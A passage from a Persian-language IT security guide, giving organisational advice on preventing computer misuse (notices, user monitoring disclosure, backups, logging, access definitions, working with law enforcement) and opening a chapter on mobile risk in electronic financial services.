‫ﻛﻠﻴﺔ ﺩﺳﺘﺮﺳﻴﻬﺎ ﻭ ﺣﻘﻮﻕ ﺩﺳﺘﺮﺳﻲ ﻫﻨﮕﺎﻡ ﭘﺎﻳـﺎﻥﻳـﺎﻓﺘﻦ‬
‫ﺩﻭﺭﺓ ﻛﺎﺭﻱ ﭘﺎﻳﺎﻥ ﻣﻲﻳﺎﺑﺪ ﻭ ﻫﺮﮔﻮﻧﻪ ﺩﺳﺘﺮﺳﻲ ﻏﻴﺮﻣﺠـﺎﺯ‬
‫ﺩﺭ ﺧﻼﻝ ﻳﺎ ﭘـﺲ ﺍﺯ ﭘﺎﻳـﺎﻥ ﺩﻭﺭﺓ ﻛـﺎﺭﻱ ﺗﺤـﺖ ﭘﻴﮕـﺮﺩ‬
‫ﻗﺎﻧﻮﻧﻲ ﻗﺮﺍﺭ ﺧﻮﺍﻫﺪ ﮔﺮﻓﺖ‪.‬‬
‫ﺩﺭ ﺍﻳﻦ ﺑﺨﺶ ﺧﻼﺻﻪﺍﻱ ﺍﺯ ﭘﻴﺸﻨﻬﺎﺩﺍﺕ ﺩﻳﮕﺮ ﺑﺮﺍﻱ ﺟﻠـﻮﮔﻴﺮﻱ‬
‫ﺍﺯ ﺳﻮﺀ ﺍﺳﺘﻔﺎﺩﺓ ﺍﺣﺘﻤﺎﻟﻲ ﺍﺯ ﺭﺍﻳﺎﻧﻪﻫﺎ ﺍﺭﺍﺋﻪ ﺷﺪﻩ ﺍﺳﺖ‪:‬‬
‫•‬
‫ﺩﺭ ﻣﺘﻦ ﺑﺮﻧﺎﻣﻪﻫﺎ ﻭ ﺩﺍﺩﻩﻫﺎﻱ ﺭﺍﻳﺎﻧﻪ‪ ،‬ﺍﻃﻼﻋﺎﺕ ﻣﺮﺑﻮﻁ ﺑﻪ‬
‫ﺣﻖ ﻧـﺴﺨﻪ ﺑـﺮﺩﺍﺭﻱ ﻭ ﻣﺎﻟﻜﻴـﺖ ﺍﻧﺤـﺼﺎﺭﻱ ﺧـﻮﺩ ﺭﺍ ﺩﺭ‬
‫ﺍﺑﺘﺪﺍﻳﻲﺗﺮﻳﻦ ﺑﺨﺶ ﻫﺮﻳﻚ ﺍﺯ ﻓﺎﻳﻠﻬـﺎ ﻗـﺮﺍﺭ ﺩﻫﻴـﺪ‪ .‬ﺍﮔـﺮ‬
‫ﺻﺮﺍﺣﺘﹰﺎ ﺑﻪ ﺣﻖ ﻧﺴﺨﻪﺑـﺮﺩﺍﺭﻱ ﺍﺷـﺎﺭﻩ ﻛـﺮﺩﻩﺍﻳـﺪ‪ ،‬ﺣﺘﻤـﹰﺎ‬
‫ﺍﻣﻜﺎﻥ ﭘﺮﻛﺮﺩﻥ ﻳﻚ ﻓﺮﻡ ﻣﺨﺼﻮﺹ ﺩﺭ ﻫﻤﻴﻦ ﺭﺍﺑﻄـﻪ ﺭﺍ‬
‫ﺑﺮﺍﻱ ﻫﺮ ﻣﺸﺘﺮﻱ ﭘﻴﺶﺑﻴﻨﻲ ﻛﻨﻴﺪ‪ .‬ﺍﻧﺠﺎﻡ ﺍﻳﻨﻜﺎﺭ ﻣﻲﺗﻮﺍﻧﺪ‬
‫ﺑﻪ ﺑﺎﺯﺭﺳﻲ ﺩﻗﻴﻖﺗﺮ ﻭ ﺗﺮﻣﻴﻢ ﺧﺴﺎﺭﺗﻬﺎ ﻛﻤﻚ ﻛﻨﺪ‪.‬‬
‫•‬
‫ﺍﻃﻤﻴﻨﺎﻥ ﺣﺎﺻـﻞ ﻛﻨﻴـﺪ ﻛـﻪ ﻛـﺎﺭﺑﺮﺍﻥ ﺩﺭﺑـﺎﺭﺓ ﺑﺎﻳـﺪﻫﺎ ﻭ‬
‫ﻧﺒﺎﻳﺪﻫﺎﻱ ﻓﻌﺎﻟﻴﺘﻬﺎ ﻭ ﻣﺴﺌﻮﻟﻴﺘﻬﺎ ﺧﻮﺩ ﺁﮔﺎﻫﻲ ﻛﺎﻣﻞ ﺩﺍﺭﻧﺪ‪.‬‬
‫•‬
‫ﺗﻤﺎﻡ ﻛﺎﺭﺑﺮﺍﻥ ﺭﺍ ﺍﺯ ﻫﺮ ﭼﻴﺰﻱ ﻛﻪ ﺩﺭ ﺷﺒﻜﺔ ﺷـﻤﺎ ﺗﺤـﺖ‬
‫ﻧﻈﺎﺭﺕ ﻗﺮﺍﺭ ﺩﺍﺭﺩ ﻣﻄﻠﻊ ﻛﻨﻴﺪ )ﺩﺭﺻـﻮﺭﺗﻴﻜﻪ ﺑـﺎ ﺍﻧﺠـﺎﻡ ﺍﻳﻨﻜـﺎﺭ‬
‫ﺳﻴﺎﺳﺘﻬﺎﻱ ﺷﻤﺎ ﻧﻘﺾ ﻧﻤﻲ ﺷﻮﺩ(‪ .‬ﺍﻳﻦ ﻧﻈﺎﺭﺕ ﻣﻲ ﺗﻮﺍﻧﺪ ﺷﺎﻣﻞ‬
‫ﻧﺎﻣﻪﻫﺎﻱ ﺍﻟﻜﺘﺮﻭﻧﻴﻜﻲ‪ ،‬ﻓﺸﺮﺩﻩﺷﺪﻥ ﻛﻠﻴﺪﻫﺎ‪ ،‬ﻭ ﺩﺳﺘﺮﺳـﻲ‬
‫ﺑﻪ ﻓﺎﻳﻠﻬﺎ ﺷﻮﺩ‪ .‬ﭼﻨﺎﻧﭽﻪ ﺩﺭ ﻣﻮﺭﺩ ﺍﻳﻦ ﻧﻈﺎﺭﺕ ﻫﺸﺪﺍﺭ ﺩﺍﺩﻩ‬
‫ﻧﺸﻮﺩ‪ ،‬ﻣﻤﻜﻦ ﺍﺳﺖ ﻧﻈﺎﺭﺕ ﺑﺮ ﻛﺎﺭﻫﺎﻱ ﻳﻚ ﻣﻬﺎﺟﻢ ﻫـﻢ‬
‫ﺑﻌﻨﻮﺍﻥ ﻧﻘﺾ ﻗﻮﺍﻧﻴﻦ ﺣﺮﻳﻢ ﺧﺼﻮﺻﻲ ﺗﻠﻘﻲ ﺷﻮﺩ‪.‬‬
‫•‬
‫ﻧﺴﺨﻪﻫﺎﻱ ﭘﺸﺘﻴﺒﺎﻥ ﺭﺍ ﺧـﻮﺏ ﺗﻬﻴـﻪ ﻛﻨﻴـﺪ ﻭ ﺍﺯ ﺁﻧﻬـﺎ ﺩﺭ‬
‫ﺟﺎﻱ ﺍﻣﻨﻲ ﻧﮕﻬﺪﺍﺭﻱ ﻛﻨﻴﺪ‪ .‬ﺍﮔـﺮ ﺑـﺮﺍﻱ ﻛـﺸﻒ ﺣﻘﻴﻘـﺖ‬
‫ﻻﺯﻡ ﺍﺳﺖ ﺍﻳﻦ ﻧﺴﺨﻪﻫﺎ ﺭﺍ ﺑﺎ ﻳﻜﺪﻳﮕﺮ ﻣﻮﺭﺩ ﻣﻘﺎﻳﺴﻪ ﻗﺮﺍﺭ‬
‫ﺩﻫﻴﺪ ﺑﺎﻳﺪ ﻗﺎﺩﺭ ﺑﺎﺷﻴﺪ ﺍﻓﺮﺍﺩﻱ ﻛﻪ ﺑﻪ ﻧﺴﺨﻪﻫﺎ ﺩﺳﺘﺮﺳـﻲ‬
‫ﺩﺍﺷﺘﻪﺍﻧﺪ ﺭﺍ ﻣﺸﺨﺺ ﻧﻤﺎﻳﻴﺪ‪ .‬ﻧﮕﻬـﺪﺍﺭﻱ ﺍﺯ ﭘـﺸﺘﻴﺒﺎﻧﻬﺎ ﺩﺭ‬
‫ﻣﺤﻴﻄﻬﺎﻱ ﻋﻤﻮﻣﻲ ﺑﺎﻋﺚ ﻣﻲﺷﻮﺩ ﺑﻌﺪﻫﺎ ﻧﺘـﻮﺍﻥ ﺍﺯ ﺁﻧﻬـﺎ‬
‫ﺑﻌﻨﻮﺍﻥ ﻣﺪﺭﻙ ﺍﺳﺘﻔﺎﺩﻩ ﻛﺮﺩ‪.‬‬
‫•‬
‫ﺩﺭﺻﻮﺭﺕ ﻣﺸﺎﻫﺪﺓ ﻫﺮﮔﻮﻧﻪ ﻣﻮﺭﺩ ﻣﺸﻜﻮﻙ ﻳﺎ ﺍﺗﻔﺎﻗﻲ ﻛﻪ‬
‫ﻧﻴﺎﺯ ﺑﻪ ﺩﺧﺎﻟﺖ ﻣﺮﺍﺟﻊ ﻗﻀﺎﻳﻲ ﺩﺍﺭﺩ‪ ،‬ﻳﺎﺩﺩﺍﺷـﺖﺑـﺮﺩﺍﺭﻱ ﺭﺍ‬
‫ﺷﺮﻭﻉ ﻛﻨﻴﺪ‪ .‬ﻣﺸﺎﻫﺪﺍﺕ ﻭ ﻓﻌﺎﻟﻴﺘﻬﺎﻱ ﺧﻮﺩ ﻭ ﺯﻣﺎﻥ ﻫﺮﻳﻚ‬
‫ﺍﺯ ﺁﻧﻬﺎ ﺭﺍ ﻳﺎﺩﺩﺍﺷﺖ ﻧﻤﺎﻳﻴﺪ‪ .‬ﺍﺯ ﻓﺎﻳﻠﻬﺎﻱ ﺛﺒﺖ ﻭ ﺭﺩﮔﻴﺮﻱﻫﺎ‬
‫ﺑﺨﺶ ﺳﻮﻡ‬
‫•‬
‫ﺳﻌﻲ ﻛﻨﻴﺪ ﺳﻄﻮﺡ ﺍﺧﺘﻴﺎﺭﺍﺕ ﻛﻠﻴﺔ ﻛﺎﺭﻣﻨﺪﺍﻥ ﻭ ﻛﺎﺭﺑﺮﺍﻥ ﺭﺍ‬
‫ﺑﺼﻮﺭﺕ ﻛﺘﺒﻲ ﺗﻌﺮﻳﻒ ﻛﻨﻴﺪ ﻭ ﻫﺮﺁﻧﭽﻪ ﻛـﻪ ﻓـﺮﺩ ﺑـﻪ ﺁﻥ‬
‫ﺩﺳﺘﺮﺳﻲ ﻗﺎﻧﻮﻧﻲ ﺩﺍﺭﺩ )ﻭ ﻧﻴﺰ ﻫﺮﭼﻪ ﻛﻪ ﺑﻪ ﺁﻥ ﺩﺳﺘﺮﺳﻲ ﻧﺪﺍﺭﺩ(‬
‫ﺭﺍ ﺩﺭ ﺍﻳﻦ ﺗﻌﺎﺭﻳﻒ ﺑﻴﺎﻭﺭﻳﺪ‪ .‬ﺑﺮﺍﻱ ﺍﺑﻼﻍ ﺍﻳـﻦ ﺗﻌـﺎﺭﻳﻒ ﺑـﻪ‬
‫ﺍﻓﺮﺍﺩ ﺳﺎﺯ ﻭ ﻛﺎﺭﻱ ﺑﻴﺎﻧﺪﻳﺸﻴﺪ ﻛﻪ ﻫﺮ ﻛﺲ ﺑﺘﻮﺍﻧﺪ ﺑﺨـﻮﺑﻲ‬
‫ﺁﻧﺮﺍ ﺑﻔﻬﻤﺪ ﻭ ﺑﻪ ﻛﺎﺭ ﺑﺒﻨـﺪﺩ‪ ،‬ﻭ ﻣﺤـﺪﻭﺩﻳﺘﻬﺎﻱ ﺣﺎﺻـﻞ ﺍﺯ‬
‫ﺁﻧﺮﺍ ﻧﻴﺰ ﺩﺭﻙ ﻛﻨﺪ‪.‬‬
‫‪١٨٤‬‬
‫ﺭﺍﻫﻨﻤﺎﻱ ﺍﻣﻨﻴﺖ ﻓﻨﺎﻭﺭﻱ ﺍﻃﻼﻋﺎﺕ‬
‫ﻣﺨﺎﻃﺮﺍﺕ ﺟﻨﺎﻳﻲ ﺩﺭ ﺣﻮﺯﺓ ﺗﺠﺎﺭﺕ‬
‫ﺍﮔﺮ ﺷﻤﺎ ﻳﻚ ‪ ISP‬ﻫﺴﺘﻴﺪ ﻳﺎ ﭘﺎﻳﮕﺎﻩ ﻭﺏ ﻭ ﻳﺎ ﺑﻪ ﻫﺮ ﺻﻮﺭﺗﻲ ﺩﺭ‬
‫ﻣﺤﻞ ﻛﺎﺭ ﺧـﻮﺩ ﺷـﺒﻜﻪﻫـﺎﻱ ﺭﺍﻳﺎﻧـﻪﺍﻱ ﺩﺍﺭﻳـﺪ‪ ،‬ﺩﺭﺻـﻮﺭﺗﻴﻜﻪ ﺍﺯ‬
‫ﺩﺳﺘﮕﺎﻫﻬﺎﻱ ﺷﻤﺎ ﺍﺳﺘﻔﺎﺩﻩ ﻧﺎﺩﺭﺳﺖ ﺷﻮﺩ ﻣﻤﻜﻦ ﺍﺳـﺖ ﺧﻮﺩﺗـﺎﻥ‬
‫ﺗﺤﺖ ﺗﻌﻘﻴﺐ ﻗﺎﻧﻮﻧﻲ ﻗﺮﺍﺭ ﺑﮕﻴﺮﻳﺪ‪.‬‬
‫ﺍﮔﺮ ﻣﻘﺎﻣﺎﺕ ﻗﻀﺎﻳﻲ ﺑﻪ ﺍﻳﻦ ﻧﺘﻴﺠﻪ ﺑﺮﺳﻨﺪ ﻛﻪ ﺭﺍﻳﺎﻧـﻪﻫـﺎﻱ ﺷـﻤﺎ‬
‫ﺗﻮﺳﻂ ﻳﻚ ﻛﺎﺭﻣﻨﺪ ﺑﺮﺍﻱ ﻧﻔﻮﺫ ﺑﻪ ﺭﺍﻳﺎﻧـﻪﻫـﺎﻱ ﺩﻳﮕـﺮ‪ ،‬ﺍﻧﺘﻘـﺎﻝ ﻭ‬
‫ﺫﺧﻴﺮﺓ ﺍﻃﻼﻋﺎﺕ ﻃﺒﻘﻪ ﺑﻨـﺪﻱ ﺷـﺪﻩ )ﺍﻋـﻢ ﺍﺳـﺮﺍﺭ ﺗﺠـﺎﺭﻱ‪ ،‬ﺗـﺼﺎﻭﻳﺮ‬
‫ﻣﺴﺘﻬﺠﻦ ﻛﻮﺩﻛﺎﻥ‪ ،‬ﻭ ‪ (...‬ﻳـﺎ ﻫﻤﻜـﺎﺭﻱ ﺩﺭ ﺟـﺮﺍﺋﻢ ﺭﺍﻳﺎﻧـﻪﺍﻱ ﻣـﻮﺭﺩ‬
‫ﺍﺳﺘﻔﺎﺩﻩ ﻗﺮﺍﺭ ﮔﺮﻓﺘﻪ‪ ،‬ﻣﻤﻜﻦ ﺍﺳﺖ ﺭﺍﻳﺎﻧﻪﻫﺎﻱ ﺷﻤﺎ ﺑﺎ ﻳﻚ ﺣﻜـﻢ‬
‫ﺗﻮﻗﻴﻒ‪ ،‬ﺑﺮﺍﻱ ﺍﻧﺠﺎﻡ ﺑﺮﺭﺳـﻴﻬﺎ ﻣـﺼﺎﺩﺭﻩ ﺷـﻮﻧﺪ‪ .‬ﺍﮔـﺮ ﺩﺭ ﺧـﻼﻝ‬
‫ﺗﺤﻘﻴﻖ ﺑﺘﻮﺍﻧﻴﺪ ﺛﺎﺑﺖ ﻛﻨﻴﺪ ﻛﻪ ﺩﺳﺘﺮﺳﻲ ﺁﻥ ﻛﺎﺭﻣﻨﺪ ﺑـﻪ ﺳﻴـﺴﺘﻢ‬
‫ﺷﻤﺎ ﻣﺤﺪﻭﺩ ﺑﻮﺩﻩ‪ ،‬ﻣﻤﻜﻦ ﺍﺳﺖ ﺩﺍﻳﺮﺓ ﺍﻳﻦ ﺗﻮﻗﻴﻒﻫﺎ ﻛﺎﻫﺶ ﭘﻴﺪﺍ‬
‫ﻛﻨﺪ‪ ،‬ﺍﻣﺎ ﺑﺎﺯ ﻫﻢ ﺑﻪ ﺍﺣﺘﻤﺎﻝ ﺯﻳﺎﺩ ﺑﺨﺸﻲ ﺍﺯ ﻣﺎﺷﻴﻨﻬﺎﻱ ﺷﻤﺎ ﻃـﻲ‬
‫ﺍﻧﺠﺎﻡ ﺗﺤﻘﻴﻘﺎﺕ ﺭﺳﻤﻲ ﺩﺭ ﺗﻮﻗﻴﻒ ﺑﺎﻗﻲ ﺧﻮﺍﻫﻨﺪ ﻣﺎﻧﺪ‪.‬‬
‫ﺑﺴﺘﻪ ﺑﻪ ﺭﺍﻫﻜﺎﺭﻫﺎﻱ ﭘﺬﻳﺮﻓﺘﻪﺷﺪﻩ ﺩﺭ ﺳﻴﺴﺘﻢ ﻗﺎﻧﻮﻧﻲ ﻫﺮ ﻛﺸﻮﺭ‪،‬‬
‫ﺍﮔﺮ ﭘﻠﻴﺲ ﻣﺤﻠﻲ ﻳﺎ ﻣﻘﺎﻣﺎﺕ ﻛـﺸﻮﺭﻱ ﻣﻌﺘﻘـﺪ ﺑﺎﺷـﻨﺪ ﻣـﺪﺍﺭﻛﻲ‬
‫ﻣﺒﻨﻲ ﺑﺮ ﺗﺨﻄﻲ ﺍﺯ ﻗﺎﻧﻮﻥ ﻭﺟـﻮﺩ ﺩﺍﺭﺩ ﺍﺯ ﻳـﻚ ﻗﺎﺿـﻲ ﺗﻘﺎﺿـﺎﻱ‬
‫ﻣﺠﻮﺯ ﺑﺮﺍﻱ ﺍﻧﺠﺎﻡ ﺗﺤﻘﻴﻖ ﻣﻲﻛﻨﻨﺪ ﻭ ﻗﺎﺿﻲ ﻧﻴﺰ ﺣﻜـﻢ ﺗﺤﻘﻴـﻖ‬
‫ﺻــﺎﺩﺭ ﻣــﻲﻧﻤﺎﻳــﺪ‪ .‬ﺩﺭ ﺳــﺎﻟﻬﺎﻱ ﺍﺧﻴــﺮ ﺗﻌــﺪﺍﺩﻱ ﺍﺯ ﺑﺎﺯﺭﺳــﺎﻥ ﻭ‬
‫ﻣﺴﺌﻮﻻﻥ ﻛﺸﻮﺭﻱ ﺍﻳﺎﻻﺕ ﻣﺘﺤﺪﻩ‪ ،‬ﺩﺭ ﺑﺮﺧﻲ ﺍﻳﺎﻟﺘﻬﺎ ﺟﺎﻳﮕﺎﻫﻲ ﺭﺍ‬
‫ﺑﺮﺍﻱ ﺍﻧﺠﺎﻡ ﺗﺤﻘﻴﻘﺎﺕ ﮔﺴﺘﺮﺩﻩ ﻭ ﺳﻨﮕﻴﻦ ﺑﻮﺟﻮﺩ ﺁﻭﺭﺩﻩ ﺍﻧﺪ‪ .‬ﻳـﻚ‬
‫ﺩﻟﻴﻞ ﺍﻳﻦ ﺍﻣﺮ‪ ،‬ﻋﺪﻡ ﺗﺠﺮﺑﺔ ﻛﺎﻓﻲ ﺩﻭﺍﻳـﺮ ﺍﺟـﺮﺍﻱ ﻗـﻮﺍﻧﻴﻦ ﺑـﺮﺍﻱ‬
‫ﺑﺮﺧﻮﺭﺩ ﺑﺎ ﺟﺮﺍﺋﻢ ﺭﺍﻳﺎﻧﻪﺍﻱ ﺍﺳﺖ ﻛﻪ ﺑﻨﻈـﺮ ﻣـﻲﺭﺳـﺪ ﺑـﺎ ﺍﻧﺠـﺎﻡ‬
‫ﺍﻳﻨﻜﺎﺭ ﻭ ﻧﻴﺰ ﻛﺎﺭﻫﺎﻱ ﻣﺸﺎﺑﻪ‪ ،‬ﺑﻪ ﻣﺮﻭﺭ ﺯﻣﺎﻥ ﺑﻬﺘﺮ ﺷﻮﺩ‪.‬‬
‫ﺍﺣﺘﻴﺎﻁ ﺑﻴﺸﺘﺮ‪...‬‬
‫•‬
‫ﺧﻮﺩ ﺭﺍ ﺑﻪ ﺳﻴﺴﺘﻤﻬﺎﻱ ﻧﻈﺎﺭﺕ ﺑـﺮ ﺷـﺒﻜﻪ ﻭ ﻧﻈـﺎﺭﺕ ﺑـﺮ‬
‫ﺻﻔﺤﻪﻛﻠﻴﺪ ﻣﺠﻬﺰ ﻛﻨﻴﺪ‪ .‬ﺍﻳﻦ ﻧﺮﻡﺍﻓﺰﺍﺭﻫﺎ ﻣـﻲﺗﻮﺍﻧﻨـﺪ ﺑـﺮ‬
‫ﺗﻤﺎﻡ ﺍﻃﻼﻋﺎﺕ ﻓﺮﺳﺘﺎﺩﻩﺷﺪﻩ ﻳﺎ ﺩﺭﻳﺎﻓﺖﺷﺪﻩ ﻧﻈﺎﺭﺕ ﻛﻨﻨﺪ‬
‫ﻭ ﺁﻧﻬﺎ ﺭﺍ ﺿﺒﻂ ﻧﻤﺎﻳﻨﺪ‪ .‬ﺍﮔﺮ ﺍﺣـﺴﺎﺱ ﻛﺮﺩﻳـﺪ ﻛـﻪ ﻣـﻮﺭﺩ‬
‫ﻧﻔﻮﺫ ﻗﺮﺍﺭ ﮔﺮﻓﺘﻪﺍﻳﺪ ﺳﺮﻳﻌﹰﺎ ﻋﻤﻠﻴـﺎﺕ ﻧﻈـﺎﺭﺕ ﻭ ﺿـﺒﻂ ﺭﺍ‬
‫ﺁﻏﺎﺯ ﻛﻨﻴﺪ ﻭ ﻣﻨﺘﻈﺮ ﺣﻜﻢ ﺩﺍﺩﮔﺎﻩ ﻧﺒﺎﺷﻴﺪ؛ ﭼﺮﺍﻛﻪ ﻧﻴﺮﻭﻫﺎﻱ‬
‫ﻻ ﺑﺪﻭﻥ ﻛﺴﺐ ﺍﺟﺎﺯﻩ ﺍﺯ ﺩﺍﺩﮔﺎﻩ ﻧﻤﻲﺗﻮﺍﻧﻨـﺪ‬
‫ﺍﻧﺘﻈﺎﻣﻲ ﻣﻌﻤﻮ ﹰ‬
‫ﺑﻪ ﺷﻤﺎ ﻣﺠﻮﺯﻱ ﺑﺪﻫﻨﺪ ﻛﻪ ﺑﺘﻮﺍﻧﻴﺪ ﺑﻌﻨﻮﺍﻥ ﻣﺠﺮﻱ ﻗﺎﻧﻮﻥ‬
‫ﻋﻤﻞ ﻧﻤﺎﻳﻴﺪ ﻭ ﺩﺭﻳﺎﻓﺖ ﺣﻜـﻢ ﻗﺎﺿـﻲ ﻣﺒﻨـﻲ ﺑـﺮ ﺍﺟـﺎﺯﺓ‬
‫ﺩﺍﺩﮔﺎﻩ ﻧﻴﺰ ﻣﻤﻜﻦ ﺍﺳﺖ ﻣﺪﺗﻬﺎ ﺑﻪ ﻃﻮﻝ ﺑﻴﺎﻧﺠﺎﻣﺪ‪.‬‬
‫•‬
‫ﺑﺎ ﻛﻤـﻚ ﻭﻛﻴـﻞ ﻭ ﺷـﺮﻛﺖ ﺑﻴﻤـﺔ ﺧـﻮﺩ ﺑـﺮﺍﻱ ﻛﺎﺭﻫـﺎ‪،‬‬
‫ﺗﺤﻘﻴﻘﺎﺕ ﻣﺮﺗﺒﻂ‪ ،‬ﻭ ﻫﺮ ﻓﻌﺎﻟﻴﺖ ﻣﺮﺑﻮﻁ ﻛﻪ ﺑﺎﻳـﺪ ﻫﻨﮕـﺎﻡ‬
‫ﻭﻗﻮﻉ ﻳﻚ ﻧﻔﻮﺫ ﺍﻧﺠﺎﻡ ﺩﻫﻴﺪ ﺑﺮﻧﺎﻣﻪ ﻫﺎﻱ ﺍﻗﺘﻀﺎﺋﻲ ﺗﺪﻭﻳﻦ‬
‫ﻛﻨﻴﺪ‪.‬‬
‫•‬
‫ﺁﻧﺪﺳﺘﻪ ﺍﺯ ﻣﺠﺮﻳﺎﻥ ﻗـﺎﻧﻮﻥ ﻛـﻪ ﺷﺎﻳـﺴﺘﮕﻲ ﺩﺍﺭﻧـﺪ ﺭﻭﻱ‬
‫ﻣﺸﻜﻼﺕ ﺑﺎﻟﻘﻮﻩ ﺗﺤﻘﻴﻖ ﻛﻨﻨﺪ ﺭﺍ ﻣـﻮﺭﺩ ﺷﻨﺎﺳـﺎﻳﻲ ﻗـﺮﺍﺭ‬
‫ﺩﻫﻴﺪ؛ ﺧﻮﺩ ﺭﺍ ﺑﻪ ﺍﻳﺸﺎﻥ ﻣﻌﺮﻓﻲ ﻛﻨﻴﺪ‪ ،‬ﻭ ﻧﮕﺮﺍﻧﻴﻬﺎﻳﺘـﺎﻥ ﺭﺍ‬
‫ﭘﻴﺶ ﺍﺯ ﻭﻗﻮﻉ ﺣﺎﺩﺛﻪ ﺑﺎ ﺁﻧﻬﺎ ﺩﺭ ﻣﻴﺎﻥ ﺑﮕﺬﺍﺭﻳـﺪ‪ .‬ﭼﻨﺎﻧﭽـﻪ‬
‫ﺩﺭ ﺁﻳﻨﺪﻩ ﺑﻪ ﻣﺸﻜﻠﻲ ﺑﺮﺧﻮﺭﺩ ﻛﺮﺩﻳﺪ ﻛﻪ ﻻﺯﻡ ﺑـﻮﺩ ﺩﺭ ﺁﻥ‬
‫ﺍﺯ ﻛﻤﻚ ﺩﻭﺍﻳﺮ ﺍﺟﺮﺍﻳﻲ ﻗﺎﻧﻮﻥ ﻭ ﻧﻴﺮﻭﻫﺎﻱ ﺍﻧﺘﻈﺎﻣﻲ ﺑﻬـﺮﻩ‬
‫ﺑﮕﻴﺮﻳﺪ‪ ،‬ﻳﻚ ﺁﺷﻨﺎﻳﻲ ﺑﺴﻴﺎﺭ ﺍﻭﻟﻴﻪ ﺑﺎ ﺍﻳﻦ ﺍﻓﺮﺍﺩ ﻣـﻲﺗﻮﺍﻧـﺪ‬
‫ﺑﺴﻴﺎﺭ ﻛﺎﺭﺳﺎﺯ ﺑﺎﺷﺪ‪.‬‬
‫•‬
‫ﭘﻴﻮﺳﺘﻦ ﺑﻪ ﺟﻮﺍﻣﻊ ﻭ ﺳﺎﺯﻣﺎﻧﻬﺎﻳﻲ ﻛﻪ ﺑﺼﻮﺭﺕ ﻣـﺪﺍﻭﻡ ﺩﺭ‬
‫ﻣﻮﺭﺩ ﺍﻣﻨﻴﺖ ﺑﻪ ﺍﻓـﺮﺍﺩ ﺁﮔـﺎﻫﻲ ﻭ ﺁﻣـﻮﺯﺵ ﻣـﻲﺩﻫﻨـﺪ ﺗـﺎ‬
‫ﺗﺨﺼﺺ ﺁﻧﻬﺎ ﺩﺭ ﺍﻳﻦ ﺯﻣﻴﻨﻪ ﺍﻓـﺰﺍﻳﺶ ﻳﺎﺑـﺪ ﺭﺍ ﻓﺮﺍﻣـﻮﺵ‬
‫ﻧﻜﻨﻴﺪ‪.‬‬
‫ﺑﺨﺶ ﺳﻮﻡ‪ :‬ﺍﻣﻨﻴﺖ ﻓﻨﺎﻭﺭﻱ ﺍﻃﻼﻋﺎﺕ ﻭ ﺳﺎﺯﻣﺎﻧﻬﺎ‬
‫ﻓﺼﻞ ﺩﻫﻢ‬
‫ﻣﺪﻳﺮﻳﺖ ﻣﺨﺎﻃﺮﺍﺕ ﺳﻴﺎﺭ‪:‬‬
‫ﺧﺪﻣﺎﺕ ﻣﺎﻟﻲ ﺍﻟﻜﺘﺮﻭﻧﻴﻜﻲ‬
‫‪١٣٢‬‬
‫ﺩﺭ ﻣﺤﻴﻂ ﺑﻲﺳﻴﻢ‬
‫ﻛﻠﻴﺎﺕ‬
‫ﻓﻨﺎﻭﺭﻱ ﺑﻲﺳﻴﻢ ﺩﺭ‬
‫ﺻﻨﺎﻳﻊ ﻭ ﺑﺨﺸﻬﺎﻱ ﺟﺪﻳﺪ‬
‫ﺭﺷﺪ ﺳﺮﻳﻊ ﺍﺳﺘﻔﺎﺩﻩ ﺍﺯ ﻓﻨﺎﻭﺭﻱ ﺑﻲﺳﻴﻢ ﺩﺭ ﺑﺴﻴﺎﺭﻱ ﺍﺯ ﺑﺎﺯﺍﺭﻫـﺎﻱ‬
‫ﺩﺭﺣﺎﻝ ﺭﺷﺪ ﺧﺪﻣﺎﺕ ﻣـﺎﻟﻲ‪ ،‬ﺗﻮﺟـﻪ ﺩﻗﻴـﻖ ﺑـﻪ ﻣـﺴﺎﺋﻞ ﺍﻣﻨﻴـﺖ‬
‫‪ ۱۳۲‬ﻣﺮﺍﺟﻌﻪ ﻛﻨﻴﺪ ﺑﻪ ﻣﻘﺎﻟﺔ ﺑﺎﻧﻚ ﺟﻬـﺎﻧﻲ ﺑـﻪ ﻗﻠـﻢ ‪Tom Kellerman‬‬
‫ﺗﺤﺖ ﻋﻨﻮﺍﻥ‪:‬‬
‫‪"Mobile Risk Management: e-Finance for the‬‬
‫‪Wireless Environment (2002)":‬‬
‫‪http://wbln0018.worldbank.org/html/FinancialS‬‬
‫‪ectorWeb.nsf/SearchGeneral?openform&E‬‬‫‪Security/E-Finance&Publications‬‬
‫ﺍﻟﻜﺘﺮﻭﻧﻴﻜﻲ ﺩﺭ ﺣﻮﺯﺓ ﺍﻳﻦ ﻓﻨﺎﻭﺭﻱ ﺭﺍ ﺿﺮﻭﺭﻱ ﻛﺮﺩﻩ ﺍﺳﺖ‪ .‬ﺍﻳـﻦ‬
‫ﻣﻮﺿﻮﻉ ﺩﺭ ﻫﻴﭽﻴﻚ ﺍﺯ ﺑﺎﺯﺍﺭﻫﺎﻱ ﺩﺭﺣﺎﻝ ﺭﺷﺪ ﺑـﻪ ﺍﻧـﺪﺍﺯﺓ ﺣـﻮﺯﺓ‬
‫ﻓﻨﺎﻭﺭﻱ ﺑﻲﺳﻴﻢ ‪ -‬ﻛﻪ ﺑﺎﻋﺚ ﺭﻭﺍﺝ ﻓﻨﺎﻭﺭﻱ ﺗﻠﻔﻦ ﻫﻤﺮﺍﻩ ﺩﺭ ﺍﻳـﻦ‬
‫ﺑﺎﺯﺍﺭﻫﺎ ﺷﺪﻩ ‪ -‬ﺍﺯ ﺍﻫﻤﻴﺖ ﺑﺮﺧﻮﺭﺩﺍﺭ ﻧﻴﺴﺖ‪ .‬ﻫﺮﭼـﻪ ﻛـﺸﻮﺭﻫﺎ ﺩﺭ‬
‫ﺍﺳﺘﻔﺎﺩﻩ ﺍﺯ ﺍﻳﻦ ﻓﻨﺎﻭﺭﻱ ﺑﺮﺍﻱ ﺍﺭﺍﺋﻪ ﺧﺪﻣﺎﺕ ﻣﺎﻟﻲ ﺑﻴـﺸﺘﺮ ﺗـﻼﺵ‬
‫ﻛﻨﻨﺪ‪ ،‬ﺗﻮﺟﻪ ﺑﻪ ﺧﻄﺮﺍﺕ ﺑﺎﻟﻘﻮﺓ ﺍﻣﻨﻴﺘـﻲ ﺩﺭ ﻓﻨـﺎﻭﺭﻱ ﺑـﻲﺳـﻴﻢ ﻭ‬
‫ﺍﻳﻨﻜﻪ ﺷﺮﻛﺎﻱ ﺗﺠﺎﺭﻱ ﺩﺭ ﺑﺎﺯﺍﺭ ﻭ ﺭﺍﻫﺒﺮﺍﻥ ﺳﻴـﺴﺘﻢ ﺩﺭ ﺑﺎﻧﻜﻬـﺎ ﻭ‬
